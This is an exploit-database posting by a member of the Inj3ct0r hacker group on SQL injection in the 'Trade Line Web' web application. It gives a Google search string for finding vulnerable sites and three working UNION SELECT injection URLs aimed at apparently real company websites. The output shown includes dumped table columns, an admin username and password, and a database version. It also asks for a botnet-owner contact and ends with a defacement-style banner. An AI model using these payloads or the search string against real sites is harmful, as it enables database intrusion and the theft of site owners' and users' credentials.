Trade Line Web <= Remote 'id' Funcs SQL-i Vulnerabilities
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KnocKout member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[~] Live Contact : knockoutr@msn.com
[~] E-Mail : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com - http://1337day.com
Special greetz to : and Endonesian Backtrack Team - 0nto.me|09exploit.com
My inj3ct0r Brothers.:)
r0073r (~) Sid3^effectS (~) r4dc0re (~) Indoushka (~) eXeSoul (~) eidelweiss (~) SeeMe (~)
XroGuE (~) agix (~) KedAns-Dz (~) gunslinger_ (~) Sn!pEr.S!Te (~) ZoRLu (~) anT!-Tr0J4n
--------------------------------------------------------
Note:' i Need botnet Owner friend! '
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Trade Line Web
|~Price : N/A
|~Version : N/A
|~Software: http://www.tradelineweb.com/
|~Vulnerability Style : SQL INJECTION
|~Vulnerability Dir : /
|~Google Keyword : "Trade Line Web" inurl:detay.php
|[~]Date : "19.05.2011"
|[~]Tested on :
DEMOS
----------------------------------------------------------
urunler.php <= 'ID' Functions Not Security
detay.php <= 'ID' Functions Not Security
---------------------------------------------------------
Example| Exploitation
SQL Injecting..
Target : http://www.chickenstrade.com/detay.php?id=-288%20and%201=1%20union%20select%201,2,group_concat%28column_name%29,4,5,6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=0x7573657273&tur=urun
Mysql Writes: id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan,id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan,id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan,id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan,id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan
Hm... ok.
SQL Injecting..
Target : http://www.parkdijital.com/urunler.php?kat_id=8%20and%201=1%20union%20select%201,group_concat%28id,0x3a,username,0x3a,password%29,3,4,5,6,7,8,9,10,11%20from%20users%20where%20id=1
Mysql Writes: 1:admin:12345
Hmm... ok.
SQL Injecting..
Target : http://www.kececigroup.com/detay.php?id=-288%20and%201=1%20union%20select%201,2,@@version,4,5,6,7,8,9,10,11%20from%20users%20where%20id=1&tur=urun
Mysql Writes : 5.0.90
================================================================
.__ _____ _______
| |__ / | |___ __\ _ \_______ ____
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
| Y \/ ^ /> <\ \_/ \ | \/\ ___/
|___| /\____ |/__/\_ \\_____ /__| \___ >
\/ |__| \/ \/ \/
_____________________________
/ _____/\_ _____/\_ ___ \
\_____ \ | __)_ / \ \/
/ \ | \\ \____
/_______ //_______ / \______ /
\/ \/ \/
Was Here. HTTP://H4X0RESEC.BLOGSOT.COM
